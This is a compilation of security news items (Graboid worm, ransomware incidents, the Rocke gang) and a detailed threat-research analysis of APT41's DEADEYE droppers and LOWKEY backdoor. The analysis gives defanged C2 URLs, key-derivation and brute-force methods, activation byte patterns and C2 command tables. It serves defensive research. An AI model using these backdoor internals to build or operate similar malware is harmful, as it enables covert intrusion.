Since we now had a large dataset of PDB paths and features, we wanted to see if we could train a traditional classifier to separate good files from bad. Using a Random Forest with some tuning, we were able to achieve an average accuracy of 87% over 10 cross validations. However, while our recall (the percentage of bad things we could identify with the model) was relatively high at 89%, our malware precision (the share of those things we called bad that were actually bad) was far too low, hovering at or below 50%. This indicates that using this model alone for malware detection would result in an unacceptably large number of false positives, were we to deploy it in the wild as a singular detection platform. However, used in conjunction with other tools, this could be a useful weak signal to assist with analysis.

Conclusion and Next Steps

While our journey of statistical PDB analysis did not yield a magic malware classifier, it did yield a number of useful findings that we were hoping for:

  1. We developed several file path feature functions which are transferable to other models under development.
  2. By diving into statistical analysis of the dataset, we were able to identify new keywords and logic branches to include in YARA signatures. These signatures have since been deployed and discovered new malware samples.
  3. We answered a number of our own general research questions about PDB paths, and were able to dispel some theories we had not fully tested with data.

While building an independent classifier was not the primary goal, improvements can surely be made to improve the end model accuracy. Generating an even larger, more diverse dataset would likely make the biggest impact on our accuracy, recall, and precision. Further hyperparameter tuning and feature engineering could also help. There is a large amount of established research into text classification using various deep learning methods such as LSTMs, which could be applied effectively to a larger dataset.

PDB paths are only one small family of file paths that we encounter in the field of cyber security. Whether in initial infection, staging, or another part of the attack lifecycle, the file paths found during forensic analysis can reveal incredibly useful information about adversary activity. We look forward to further community research on how to properly extract and represent that information.

Graboid the first-ever Cryptojacking worm that targets Docker Hub

Security experts at Palo Alto Networks discovered a worm dubbed Graboid that spreads using Docker containers.

Palo Alto Networks researchers discovered a new Monero miner with wormable capabilities, dubbed Graboid, that spreads using Docker containers.

Experts discovered that to target new systems, the Graboid worm periodically queries the C&C for vulnerable hosts, in this way the malicious code is instructed about the next target to infect.

“Unit 42 researchers identified a new cryptojacking worm we’ve named Graboid that’s spread to more than 2,000 unsecured Docker hosts. We derived the name by paying homage to the 1990’s movie “Tremors,” since this worm behaves similarly to the sandworms in the movie, in that it moves in short bursts of speed, but overall is relatively inept.” reads the analysis published by the experts.

Graboid is the first-ever Cryptojacking worm found in images on Docker Hub, the analysis conducted by the experts shows that, on average, each miner is active 63% of the time, with the mining periods being of 250 seconds.

Palo Alto Networks found over 2,000 Docker engines unsecured online, this means that threat actors could to take full control of them and abuse their resources for malicious purposes.

The hackers first compromise an unsecured Docker daemon, then they ran the malicious container from Docker Hub, it fetches scripts and a list of vulnerable hosts from the C&C, and spread targeting the host in the list.

‘Graboid’ implements both worm-spreading and cryptojacking capabilities inside containers. The experts noticed that the malware randomly selects three targets at each iteration. It installs the worm on the first target, stops the miner on the second target, and starts the miner on the third target, leading to a very random mining behavior.

“Essentially, the miner on every infected host is randomly controlled by all other infected hosts. The motivation for this randomized design is unclear. It can be a bad design, an evasion technique (not very effective), a self-sustaining system or some other purposes.” continues the analysis.

Experts reported that the malicious Docker image (pocosow/centos) has been downloaded more than 10,000 times from Docker Hub, while the gakeaws/nginx image has been downloaded over 6,500 times.

“While this cryptojacking worm doesn’t involve sophisticated tactics, techniques, or procedures, the worm can periodically pull new scripts from the C2s, so it can easily repurpose itself to ransomware or any malware to fully compromise the hosts down the line and shouldn’t be ignored.” concludes the analysis. “If a more potent worm is ever created to take a similar infiltration approach, it could cause much greater damage, so it’s imperative for organizations to safeguard their Docker hosts.”

Pierluigi Paganini

(SecurityAffairs – Graboid, hacking)

The post Graboid the first-ever Cryptojacking worm that targets Docker Hub appeared first on Security Affairs.

M6 Group, largest France private multimedia group, hit by ransomware attack

M6, one of France’s biggest TV channels, hit by ransomware

Unlike The Weather Channel earlier this year, M6 remained on the air.

The M6 Group, the largest France private multimedia group, was the victim of ransomware over the weekend.

The systems at the M6 Group, France’s largest private multimedia group, were infected with the ransomware over the weekend, fortunately, none of the company’s TV and radio channels interrupted the broadcasts.

According to the French newspaper L’Express, the ransomware attack only impacted landlines and e-mail.

“The company’s phone lines and e-mail are unusable, so employees have to use their mobile phones and text messages to communicate,” an internal source told the newspaper. “all the office and management tools are in disruption.” 

The company revealed the incident took place on Saturday.

The cybersecurity staff at the M6 Group was able to immediately mitigate the threat preventing any downtime its TV channels, radio stations, and film studios.

“The M6 ​​Group was the target of a malicious computer attack on Saturday morning, and the quick and efficient intervention of our cyber security experts has helped to ensure the continued security of the Internet. good broadcasting of the programs on all our TV and radio antennas “.  reads the message posted through the Twitter account of the group.

In April, another broadcast suffered a similar incident, a cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

In April 2015, the TV5Monde was hit by a severe cyber attack that compromised broadcasting of transmissions across its medium. The attackers also hijacked the Channel TV5Monde website and social media accounts of the French broadcaster.

Yves Bigot, at the time the director-general of TV5Monde told the BBC that the cyber-attack came close to destroying the network of the French TV and investigation suggested Russia-linked APT28 group.

Pierluigi Paganini

(SecurityAffairs – M6 Group, ransomware)

The post M6 Group, largest France private multimedia group, hit by ransomware attack appeared first on Security Affairs.

1 in 5 SMBs have fallen victim to a ransomware attack

Ransomware remains the most common cyber threat to SMBs, according to a Datto survey of more than 1,400 MSP decision makers that manage the IT systems for small-to-medium-sized businesses. SMBs are a prime target While it is used against businesses of all sizes, SMBs have become a prime target for attackers. The report uncovered a number of ransomware trends specifically impacting the SMB market: Ransomware attacks are pervasive. The number of ransomware attacks against SMBs … More

The post 1 in 5 SMBs have fallen victim to a ransomware attack appeared first on Help Net Security.

WAV files spotted delivering malicious code

Attackers have embedded crypto-mining and Metasploit code into WAV audio files to stymie threat detection solutions. “All WAV files discovered adhere to the format of a legitimate WAV file (i.e., they are all playable by a standard audio player),” Josh Lemos, VP of Research and Intelligence at BlackBerry Cylance, told Help Net Security. “One WAV file contained music with no indication of distortion or corruption and the others contained white noise. One of the WAV … More

The post WAV files spotted delivering malicious code appeared first on Help Net Security.

Chinese-speaking cybercrime gang Rocke changes tactics

Chinese-speaking cybercrime gang Rocke that carried out several large-scale cryptomining campaigns, has now using news tactics to evade detection.

Chinese-speaking cybercrime gang Rocke, that carried out several large-scale cryptomining campaigns in past, has now using news tactics to evade detection. The group has been observed using new tactics, techniques, and procedures (TTPs), it is also using updated malware to evade detection.

The cybercrime organization was first spotted in April 2018 by researchers at Cisco Talos, earlier 2019 researchers from Palo Alto Networks Unit42 found new malware samples used by the Rocke group for cryptojacking that uninstalls from Linux servers cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud.

In March, the group was using a dropper dubbed LSD that was controlled via Pastebin, but since this summer the threat actors have changed Command and Control (C2) infrastructure using a self-hosted solution.

The malicious code is used by the hackers to deliver a Moner (XMR) crypto miner that is not detected by almost any antivirus solution.

The Rocke group was also observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners.

“Rocke, a China-based cryptomining threat actor, has changed its Command and Control (C2) infrastructure away from Pastebin to a self-hosted solution during the summer of 2019.” reads the analysis published by the security firm Anomaly. “the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (DoH) if the DNS query fails. In addition to the C2 change, functionality was also added to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088.”

The use of self-hosted and DNS records makes it hard to detect the group’s operations and takedowns. The new LSD sample was first spotted on September 17 as reported in the following graph.

The group also improved its LSD dropper by adding the malicious code to exploit CVE-2016-3088 in ActiveMQ servers.

In order to ensure that only its miner is running on the infected machine, the group attempt to kill any other processes with high CPU usage. The LSD malware analyzed the MD5 hash of the files to avoid killing its instance running on the system.

“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity,” concludes Anomali Labs.

“It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future.”

Technical details, including Indicators of Compromise, are reported in the analysis published by Anomali.

Pierluigi Paganini

(SecurityAffairs – Rocke cybercrime gang, miner)

The post Chinese-speaking cybercrime gang Rocke changes tactics appeared first on Security Affairs.

Fake mobile app fraud tripled in first half of 2019

In Q2 2019, RSA Security identified 57,406 total fraud attacks worldwide. Of these, phishing attacks were the most prevalent (37%), followed by fake mobile apps (usually apps posing as those of popular brands). But while phishing went up by just 6 percent when the numbers from 1H 2019 are compared to those from 2H 2018, attacks via financial malware and rogue mobile apps have increased significantly (80 and 191 percent, respectively). “The fact that fraud … More

The post Fake mobile app fraud tripled in first half of 2019 appeared first on Help Net Security.

Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack

The global shipping and mailing services company Pitney Bowes suffered a partial outage of its service caused by a ransomware attack.

The Pitney Bowes company announced that a ransomware attack infected its systems and cause a partial system outage that made some of its service unavailable for some customers. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

“Pitney Bowes was affected by a malware attack that encrypted information on some systems and disrupted customer access to some of our services. At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” reads a press release published by the company.

“At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” 

The good news is that there is no evidence that hackers accessed company information. The company has hired an external security firm to support its investigation into the security breach.

The mailing system products were paralyzed by the attack, the company confirmed that the following systems are currently NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company pointed out that even is its customers will not be able to refill their postage meter until the systems are restored, that can will be able to print postage if they have funds.

Clients with Mail360 and MIPro Licensing products have no access to Your Account, Data fulfillment, and some of our Support pages, with Software and Data Marketplace downloads being unavailable.

For Commerce Services clients, impacted solutions include Fulfillment, Delivery and Returns clients and Presort services were impacted.

The Software and Data products are not affected by the ransomware attacks because they do not access the backend systems of the Pitney Bowes network.

Customers can visit the page www.pb.com/systemupdate to receive up to date information on the incident.

Pierluigi Paganini

(SecurityAffairs – Pitney Bowes, hacking)

The post Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack appeared first on Security Affairs.

LOWKEY: Hunting for the Missing Volume Serial ID

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group: APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services.

This blog post is about the sophisticated passive backdoor we track as LOWKEY, mentioned in the APT41 report and recently unveiled at the FireEye Cyber Defense Summit. We observed LOWKEY being used in highly targeted attacks, utilizing payloads that run only on specific systems. Additional malware family names are used in the blog post and briefly described. For a complete overview of malware used by APT41 please refer to the Technical Annex section of our APT41 report.

The blog post is split into three parts, which are shown in Figure 1. The first describes how we managed to analyze the encrypted payloads. The second part features position independent loaders we observed in multiple samples, adding an additional layer of obfuscation. The final part is about the actual backdoor we call LOWKEY, which comes in two variants, a passive TCP listener and a passive HTTP listener targeting Internet Information Services (IIS).


Figure 1: Blog post overview

DEADEYE – RC5

Tracking APT41 activities over the past months, we observed multiple samples that shared two unique features: the use of RC5 encryption which we don’t encounter often, and a unique string “f@Ukd!rCto R$.”. We track these samples as DEADEYE.

DEADEYE comes in multiple variants:

  • DEADEYE.DOWN has the capability to download additional payloads.
  • DEADEYE.APPEND has additional payloads appended to it.
  • DEADEYE.EXT loads payloads that are already present on the system.

DEADEYE.DOWN

A sample belonging to DEADEYE.DOWN (MD5: 5322816c2567198ad3dfc53d99567d6e) attempts to download two files on the first execution of the malware.

The first file is downloaded from hxxp://checkin.travelsanignacio[.]com/static/20170730.jpg. The command and control (C2) server response is first RC5 decrypted with the key “wsprintfA” and then RC5 encrypted with a different key and written to disk as <MODULE_NAME>.mui.

The RC5 key is constructed using the volume serial number of the C drive. The volume serial number is a 4-byte value, usually based on the install time of the system. The volume serial number is XORed with the hard-coded constant “f@Ukd!rCto R$.” and then converted to hex to derive a key of up to 28 bytes in length. The key length can vary if the XORed value contains an embedded zero byte because the lstrlenA API call is used to determine the length of it. Note that the lstrlenA API call happens before the result is converted to hex. If the index of the byte modulo 4 is zero, the hex conversion is in uppercase. The key derivation is illustrated in Table 1.

Volume Serial number of C drive, for example 0xAABBCCDD

F          ^          0xAA

=          0xCC

uppercase

@         ^          0xBB

=          0xFB

lowercase

U          ^          0xCC

=          0x99

lowercase

k          ^          0xDD

=          0xB6

lowercase

d          ^          0xAA

=          0xCE

uppercase

!           ^          0xBB

=          0x9A

lowercase

r           ^          0xCC

=          0xBE

lowercase

C          ^          0xDD

=          0x9E

lowercase

t           ^          0xAA

=          0xDE

uppercase

o          ^          0xBB

=          0xD4

lowercase

(0x20)   ^          0xCC

=          0xEC

lowercase

R          ^          0xDD

=          0x8F

lowercase

$          ^          0xAA

=          0x8E

uppercase

.           ^          0xBB

=          0x95

lowercase

Derived key CCfb99b6CE9abe9eDEd4ec8f8E95

Table 1: Key derivation example

The second file is downloaded from hxxp://checkin.travelsanignacio[.]com/static/20160204.jpg. The C2 response is RC5 decrypted with the key “wsprintfA” and then XORed with 0x74, before it is saved as C:\Windows\System32\wcnapi.mui.


Figure 2: 5322816c2567198ad3dfc53d99567d6e download

The sample then determines its own module name, appends the extension mui to it and attempts to decrypt the file using RC5 encryption. This effectively decrypts the file the malware just downloaded and stored encrypted on the system previously. As the file has been encrypted with a key based on the volume serial number it can only be executed on the system it was downloaded on or a system that has the same volume serial number, which would be a remarkable coincidence.

An example mui file is the MD5 hash e58d4072c56a5dd3cc5cf768b8f37e5e. Looking at the encrypted file in a hex editor reveals a high entropy (7.999779/8). RC5 uses Electronic Code Book (ECB) mode by default. ECB means that each code block (64 bit) is encrypted independent from other code blocks. This means the same plaintext block always results in the same cipher text, independent from its position in the binary. The file has 792933 bytes in total but almost no duplicate cipher blocks, which means the data likely has an additional layer of encryption.

Without the correct volume serial number nor any knowledge about the plaintext there is no efficient way to decrypt the payload e58d4072c56a5dd3cc5cf768b8f37e5e with just the knowledge of the current sample.

DEADEYE.APPEND

Fortunately searching for the unique string “f@Ukd!rCto R$.“ in combination with artifacts from RC5 reveals additional samples. One of the related samples is DEADEYE.APPEND (MD5: 37e100dd8b2ad8b301b130c2bca3f1ea), which has been previously analyzed by Kaspersky (https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/). This sample is different because it is protected with VMProtect and has the obfuscated binary appended to it. The embedded binary starts at offset 3287552 which can be seen in Figure 3 with the differing File Size and PE Size.


Figure 3: A look at the PE header reveals a larger file size than PE size

The encrypted payload has a slightly lower entropy of 7.990713 out of 8. Looking at the embedded binary in a hex editor reveals multiple occurrences of the byte pattern 51 36 94 A4 26 5B 0F 19, as seen in Figure 4. As this pattern occurs multiple times in a row in the middle of the encrypted data and ECB mode is being used, an educated guess is that the plaintext is supposed to be 00 00 00 00 00 00 00 00.


Figure 4: Repeating byte pattern in 37e100dd8b2ad8b301b130c2bca3f1ea

RC5 Brute Forcer

With this knowledge we decided to take a reference implementation of RC5 and add a main function that accounts for the key derivation algorithm used by the malware samples (see Figure 5). Brute forcing is possible as the key is derived from a single DWORD; even though the final key length might be 28 bytes, there are only 4294967296 possible keys. The code shown in Figure 5 generates all possible volume serial numbers, derives the key from them and tries to decrypt 51 36 94 A4 26 5B 0F 19 to 00 00 00 00 00 00 00 00. Running the RC5 brute forcer for a couple of minutes shows the correct volume serial number for the sample, which is 0xc25cff4c.

Note if you want to run the brute forcer yourself
The number of DWORDs of the key in the reference implementation we used is represented by the global c, and we had to change it to 7 to match the malware’s key length of 28 bytes. There were some issues with the conversion because in the malware a zero byte within the generated key ultimately leads to a shorter key length. The implementation we used uses a hard-coded key length (c), so we generated multiple executables with c = 6, c = 5, c = 4… as these usually only ran for a couple of minutes to cover the entire key space. All the samples mentioned in the Appendix 1 could be solved with c = 7 or c = 6.


Figure 5: Main function RC5 brute forcer

The decrypted payload belongs to the malware family POISONPLUG (MD5: 84b69b5d14ba5c5c9258370c9505438f). POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded command and control commands.

We confirmed the findings from Kaspersky and additionally found a second command and control URL hxxps://steamcommunity[.]com/id/oswal053, as mentioned in our APT 41 report.

Taking everything into account that we learned from DEADEYE.APPEND (MD5: 37e100dd8b2ad8b301b130c2bca3f1ea), we decided to take another look at the encrypted mui file (e58d4072c56a5dd3cc5cf768b8f37e5e). Attempts to brute force the first bytes to match with the ones of the decrypted POISONPLUG payload did not yield any results.

Fortunately, we found additional samples that use the same encryption scheme. In one of the samples the malware authors included two checks to validate the decrypted payload. The expected plaintext at the specified offsets for DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff) is shown in Table 2.

Offset

Expected byte after decryption

0

0x48

1

0x8B

0x3C0

0x48

0x3C1

0x83

Table 2: Byte comparisons after decrypting in DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff)

Applying these constraints to our brute forcer and trying to decrypt mui file (e58d4072c56a5dd3cc5cf768b8f37e5e) once more resulted in a low number of successful hits which we could then manually check. The correct volume serial number for the encrypted mui is 0x243e2562. Analysis determined the decrypted file is XMRig miner. This also explains why the dropper downloads two files. The first, <MODULE_NAME>.mui is the crypto miner, and the second C:\Windows\System32\wcnapi.mui, is the configuration. The decrypted mui contains another layer of obfuscation and is eventually executed with the command x -c wcnapi.mui. An explanation on how the command was obtained and the additional layer of obfuscation is given in the next part of the blog post.

For a list of samples with the corresponding volume serial numbers, please refer to Appendix 1.

Additional RC4 Layer

An additional RC4 layer has been identified in droppers used by APT41, which we internally track as DEADEYE. The layer has been previously detailed in a blog post by ESET. We wanted to provide some additional information on this, as it was used in some of the samples we managed to brute force.

The additional layer is position independent shellcode containing a reflective DLL loader. The loader decrypts an RC4 encrypted payload and loads it in memory. The code itself is a straight forward loader with the exception of some interesting artifacts identified during analysis.

As mentioned in the blog post by ESET, the encrypted payload is prepended with a header. It contains the RC4 encryption key and two fields of variable length, which have previously been identified as file names. These two fields are encrypted with the same RC4 encryption key that is also used to decrypt the payload. The header is shown in Table 3.

Header bytes

Meaning

0 15

RC4 key XOR encoded with 0x37

16 19

Size of loader stub before the header

20 23

RC4 key size

24 27

Command ASCII size (CAS)

28 31

Command UNICODE size (CUS)

32 35

Size of encrypted payload

36 39

Launch type

40 (40 + CAS)

Command ASCII

(40 + CAS) (40 + CAS + CUS)

Command UNICODE

(40 + CAS + CUS) (40 + CAS + CUS + size of encrypted payload)

Encrypted payload

Table 3: RC4 header overview

Looking at the payloads hidden behind the RC5 layer, we observed, that these fields are not limited to file names, instead they can also contain commands used by the reflective loader. If no command is specified, the default parameter is the file name of the loaded payload. In some instances, this revealed the full file path and file name in the development environment. Table 4 shows some paths and file names. This is also how we found the command (x -c wcnapi.mui) used to launch the decrypted mui file from the first part of the blog post.

MD5 hash

Arguments found in the RC4 layer

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\Inner-Loader\x64\Release\Inner-Loader.dll

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\NetAgent\x64\Release\NetAgent.exe

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\SK3.x\x64\Release\SK3.x.exe

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

UserFunction.dll

7f05d410dc0d1b0e7a3fcc6cdda7a2ff

ProcTran.dll

c11dd805de683822bf4922aecb9bfef5

E:\code\PortReuse\iis-share\2.5\IIS_Share\x64\Release\IIS_Share.dll

c11dd805de683822bf4922aecb9bfef5

UserFunction.dll

c11dd805de683822bf4922aecb9bfef5

ProcTran.dll

Table 4: Decrypted paths and file names

LOWKEY

The final part of the blog post describes the capabilities of the passive backdoor LOWKEY (MD5: 8aab5e2834feb68bb645e0bad4fa10bd) decrypted from DEADEYE.APPEND (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff). LOWKEY is a passive backdoor that supports commands for a reverse shell, uploading and downloading files, listing and killing processes and file management. We have identified two variants of the LOWKEY backdoor.

The first is a TCP variant that listens on port 53, and the second is an HTTP variant that listens on TCP port 80. The HTTP variant intercepts URL requests matching the UrlPrefix http://+:80/requested.html. The + in the given UrlPrefix means that it will match any host name. It has been briefly mentioned by Kaspersky as “unknown backdoor”.

Both variants are loaded by the reflective loader described in the previous part of the blog post. This means we were able to extract the original file names. They contain meaningful names and provide a first hint on how the backdoor operates.

HTTP variant (MD5: c11dd805de683822bf4922aecb9bfef5)
E:\code\PortReuse\iis-share\2.5\IIS_Share\x64\Release\IIS_Share.dll

TCP variant (MD5: 7f05d410dc0d1b0e7a3fcc6cdda7a2ff)
E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\SK3.x\x64\Release\SK3.x.exe

The interesting parts are shown in Figure 6. PortReuse describes the general idea behind the backdoor, to operate on a well-known port. The paths also contain version numbers 2.5 and v1.3-53. IIS_Share is used for the HTTP variant and describes the targeted application, DeviceIOContrl-Hook is used for the TCP variant.


Figure 6: Overview important parts of executable path

Both LOWKEY variants are functionally identical with one exception. The TCP variant relies on a second component, a user mode rootkit that is capable of intercepting incoming TCP connections. The internal name used by the developers for that component is E:\code\PortReuse\3389-share\DeviceIOContrl-Hook\v1.3-53\NetAgent\x64\Release\NetAgent.exe.


Figure 7: LOWKEY components

Inner-Loader.dll

Inner-Loader.dll is a watch guard for the LOWKEY backdoor. It leverages the GetExtendedTcpTable API to retrieve all processes with an open TCP connection. If a process is listening on TCP port 53 it injects NetAgent.exe into the process. This is done in a loop with a 10 second delay. The loader exits the loop when NetAgent.exe has been successfully injected. After the injection it will create a new thread for the LOWKEY backdoor (SK3.x.exe).

The watch guard enters an endless loop that executes every 20 minutes and ensures that the NetAgent.exe and the LOWKEY backdoor are still active. If this is not the case it will relaunch the backdoor or reinject the NetAgent.exe.

NetAgent.exe

NetAgent.exe is a user mode rootkit that provides covert communication with the LOWKEY backdoor component. It forwards incoming packets, after receiving the byte sequence FF FF 01 00 00 01 00 00 00 00 00 00, to the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001}.

The component works by hooking the NtDeviceIoControlFile API. It does that by allocating a suspiciously large region of memory, which is used as a global hook table. The table consists of 0x668A0 bytes and has read, write and execute permissions set.

Each hook table entry consists of 3 pointers. The first points to memory containing the original 11 bytes of each hooked function, the second entry contains a pointer to the remaining original instructions and the third pointer points to the function hook. The malware will only hook one function in this manner and therefore allocates an unnecessary large amount of memory. The malware was designed to hook up to 10000 functions this way.

The hook function begins by iterating the global hook table and compares the pointer to the hook function to itself. This is done to find the original instructions for the installed hook, in this case NtDeviceIoControlFile. The malware then executes the saved instructions which results in a regular NtDeviceIoControlFile API call. Afterwards the IoControlCode is compared to 0x12017 (AFD_RECV).

If the IoControlCode does not match, the original API call results are returned.

If they match the malware compares the first 12 bytes of the incoming data. As it is effectively a TCP packet, it is parsing the TCP header to get the data of the packet. The first 12 bytes of the data section are compared against the hard-coded byte pattern: FF FF 01 00 00 01 00 00 00 00 00 00.

If they match it expects to receive additional data, which seems to be unused, and then responds with a 16 byte header 00 00 00 00 00 91 03 00 00 00 00 00 80 1F 00 00, which seems to be hard-coded and to indicate that following packets will be forwarded to the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001}. The backdoor component (SK3.x.exe) receives and sends data to the named pipe. The hook function will forward all received data from the named pipe back to the socket, effectively allowing a covert communication between the named pipe and the socket.

SK3.x.exe

SK3.x.exe is the actual backdoor component. It supports writing and reading files, modification of file properties, an interactive command shell, TCP relay functionality and listing running processes. The backdoor opens a named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001} for communication.

Data received by the backdoor is encrypted with RC4 using the key “CreateThread“ and then XORed with 0x77. All data sent by the backdoor uses the same encryption in reverse order (first XOR with 0x77, then RC4 encrypted with the key “CreateThread“). Encrypted data is preceded by a 16-byte header which is unencrypted containing an identifier and the size of the following encrypted packet.

An example header looks as follows:
00 00 00 00 00 FD 00 00 10 00 00 00 00 00 00 00

Bytes

Meaning

00 00 00 00 00

unknown

FD 00

Bytes 5 and 6 are the command identifier, for a list of all supported identifiers check Table 6 and Table 7.

00

unknown

10 00 00 00

Size of the encrypted packet that is send after the header

00 00 00 00

unknown

Table 5: Subcomponents of header

The backdoor supports the commands listed in tables Table 6 and Table 7. Most commands expect a string at the beginning which likely describes the command and is for the convenience of the operators, but this string isn't actively used by the malware and could be anything. For example, KILL <PID> could also be A <PID>. Some of the commands rely on two payloads (UserFunction.dll and ProcTran.dll), that are embedded in the backdoor and are either injected into another process or launch another process.

UserFunction.dll

Userfunction.dll starts a hidden cmd.exe process, creates the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00000} and forwards all received data from the pipe to the standard input of the cmd.exe process. All output from the process is redirected back to the named pipe. This allows interaction with the shell over the named pipe.

ProcTran.dll

The component opens a TCP connection to the provided host and port, creates the named pipe \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00001} and forwards all received data from the pipe to the opened TCP connection. All received packets on the connection are forwarded to the named pipe. This allows interaction with the TCP connection over the named pipe.

Identifier

Arguments

Description

0xC8

<cmd> <arg1> <arg2>

Provides a simple shell, that supports the following commands, dir, copy, move, del, systeminfo and cd. These match the functionality of standard commands from a shell. This is the only case where the <cmd> is actually used.

0xC9

<cmd> <arg1>

The argument is interpreted as a process id (PID). The backdoor injects UserFunction.dll into the process, which is an interactive shell that forwards all input and output data to Microsoft Ole Object {30000-7100-12985-00000-00000}. The backdoor will then forward incoming data to the named pipe allowing for communication with the opened shell. If no PID is provided, the `cmd.exe` is launched as child process of the backdoor process with input and output redirected to the named pipe Microsoft Ole Object {30000-7100-12985-00001-00001}

0xCA

<cmd> <arg1> <arg2>

Writes data to a file. The first argument is the <file_name>, the second argument is an offset into the file

0xCB

<cmd> <arg1> <arg2>
<arg3>

Reads data from a file. The first argument is the <file_name>, the second argument is an offset into the file, the third argument is optional, and the exact purpose is unknown

0xFA

-

Lists running processes, including the process name, PID, process owner and the executable path

0xFB

<cmd> <arg1>

Kills the process with the provided process id (PID)

0xFC

<cmd> <arg1> <arg2>

Copies the files CreationTime, LastAccessTime and LastWriteTime from the second argument and applies them to the first argument. Both arguments are expected to be full file paths. The order of the arguments is a bit unusual, as one would usually apply the access times from the second argument to the third

0xFD

-

List running processes with additional details like the SessonId and the CommandLine by executing the WMI query SELECT Name,ProcessId,SessionId,CommandLine,ExecutablePath FROM Win32_Process

0xFE

-

Ping command, the malware responds with the following byte sequence 00 00 00 00 00 65 00 00 00 00 00 00 06 00 00 00. Experiments with the backdoor revealed that the identifier 0x65 seems to indicate a successful operation, whereas 0x66 indicates an error.

Table 6: C2 commands

The commands listed in Table 7 are used to provide functionality of a TCP traffic relay. This allows operators to communicate through the backdoor with another host via TCP. This could be used for lateral movement in a network. For example, one instance of the backdoor could be used as a jump host and additional hosts in the target network could be reached via the TCP traffic relay. Note that the commands 0xD2, 0xD3 and 0xD6 listed in Table 7 can be used in the main backdoor thread, without having to use the ProcTran.dll.

Identifier

Arguments

Description

0x105

<cmd> <arg1>

The argument is interpreted as a process id (PID). The backdoor injects ProcTran.dll into the process, which is a TCP traffic relay component that forwards all input and output data to Microsoft Ole Object {30000-7100-12985-00000-00001}. The commands 0xD2, 0xD3 and 0xD6 can then be used with the component.

0xD2

<arg1> <arg2>

Opens a connection to the provided host and port, the first argument is the host, the second the port. On success a header with the identifier set to 0xD4 is returned (00 00 00 00 00 D4 00 00 00 00 00 00 00 00 00 00). This effectively establishes a TCP traffic relay allowing operators to communicate with another system through the backdoored machine.

0xD3

<arg1>

Receives and sends data over the connection opened by the 0xD2 command. Received data is first RC4 decrypted with the key “CreateThread“ and then single-byte XOR decoded with 0x77. Data sent back is directly relayed without any additional encryption.

0xD6

-

Closes the socket connection that had been established by the 0xD2 command

0xCF

-

Closes the named pipe Microsoft Ole Object {30000-7100-12985-00000-00001} that is used to communicate with the injected ProcTran.dll. This seems to terminate the thread in the targeted process by the 0x105 command

Table 7: C2 commands TCP relay

Summary

The TCP LOWKEY variant passively listens for the byte sequence FF FF 01 00 00 01 00 00 00 00 00 00 on TCP port 53 to be activated. The backdoor then uses up to three named pipes for communication. One pipe is used for the main communication of the backdoor, the other ones are used on demand for the embedded payloads.

  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00001-00001} main communication pipe
  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00001} named pipe used for interaction with the TCP relay module ProcTran.dll
  • \\.\pipe\Microsoft Ole Object {30000-7100-12985-00000-00000} named pipe used for the interactive shell module UserFunction.dll

Figure 8 summarizes how the LOWKEY components interact with each other.


Figure 8: LOWKEY passive backdoor overview

Appendix

MD5 HASH

Correct Volume Serial

Dropper Family

Final Payload Family

2b9244c526e2c2b6d40e79a8c3edb93c

0xde82ce06

DEADEYE.APPEND

POISONPLUG

04be89ff5d217796bc68678d2508a0d7

0x56a80cc8

DEADEYE.APPEND

POISONPLUG

092ae9ce61f6575344c424967bd79437

0x58b5ef5c

DEADEYE.APPEND

LOWKEY.HTTP

37e100dd8b2ad8b301b130c2bca3f1ea

0xc25cff4c

DEADEYE.APPEND

POISONPLUG

39fe65a46c03b930ccf0d552ed3c17b1

0x24773b24

DEADEYE.APPEND

POISONPLUG

5322816c2567198ad3dfc53d99567d6e

-

DEADEYE.DOWN

-

557ff68798c71652db8a85596a4bab72

0x4cebb6e9

DEADEYE.APPEND

POISONPLUG

64e09cf2894d6e5ac50207edff787ed7

0x64fd8753

DEADEYE.APPEND

POISONPLUG

